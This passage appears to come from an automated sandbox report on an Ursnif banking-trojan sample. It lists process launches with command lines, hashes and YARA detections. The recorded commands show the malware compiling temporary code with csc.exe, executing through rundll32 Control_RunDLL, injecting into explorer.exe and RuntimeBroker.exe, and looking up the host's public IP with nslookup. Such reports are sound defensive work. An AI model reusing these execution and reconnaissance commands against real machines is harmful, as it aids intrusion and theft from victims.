                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP'
                                                                                                                                            Imagebase:0x7ff6cf4b0000
                                                                                                                                            File size:47280 bytes
                                                                                                                                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            Analysis Process: csc.exe PID: 6140 Parent PID: 6356

                                                                                                                                            General

                                                                                                                                            Start time:13:34:17
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
                                                                                                                                            Imagebase:0x7ff67a530000
                                                                                                                                            File size:2739304 bytes
                                                                                                                                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Reputation:moderate

                                                                                                                                            Analysis Process: cvtres.exe PID: 1152 Parent PID: 6140

                                                                                                                                            General

                                                                                                                                            Start time:13:34:18
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP'
                                                                                                                                            Imagebase:0x7ff6cf4b0000
                                                                                                                                            File size:47280 bytes
                                                                                                                                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            Analysis Process: control.exe PID: 5232 Parent PID: 7080

                                                                                                                                            General

                                                                                                                                            Start time:13:34:21
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\System32\control.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\control.exe -h
                                                                                                                                            Imagebase:0x7ff76ba10000
                                                                                                                                            File size:117760 bytes
                                                                                                                                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            Analysis Process: rundll32.exe PID: 5392 Parent PID: 5232

                                                                                                                                            General

                                                                                                                                            Start time:13:34:24
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                                                                                                            Imagebase:0x7ff6b7e60000
                                                                                                                                            File size:69632 bytes
                                                                                                                                            MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: explorer.exe PID: 3388 Parent PID: 6356

                                                                                                                                            General

                                                                                                                                            Start time:13:34:27
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:
                                                                                                                                            Imagebase:0x7ff714890000
                                                                                                                                            File size:3933184 bytes
                                                                                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                            Analysis Process: RuntimeBroker.exe PID: 3668 Parent PID: 3388

                                                                                                                                            General

                                                                                                                                            Start time:13:34:38
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:
                                                                                                                                            Imagebase:0x7ff6883e0000
                                                                                                                                            File size:99272 bytes
                                                                                                                                            MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                            Analysis Process: RuntimeBroker.exe PID: 4376 Parent PID: 3388

                                                                                                                                            General

                                                                                                                                            Start time:13:34:42
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:
                                                                                                                                            Imagebase:0x7ff6883e0000
                                                                                                                                            File size:99272 bytes
                                                                                                                                            MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                            Analysis Process: cmd.exe PID: 5884 Parent PID: 3388

                                                                                                                                            General

                                                                                                                                            Start time:13:34:43
                                                                                                                                            Start date:20/11/2020
                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A736.bi1'
                                                                                                                                            Imagebase:0x7ff77d8b0000
                                                                                                                                            File size:273920 bytes
                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                            Disassembly

                                                                                                                                            Code Analysis

                                                                                                                                            Reset < >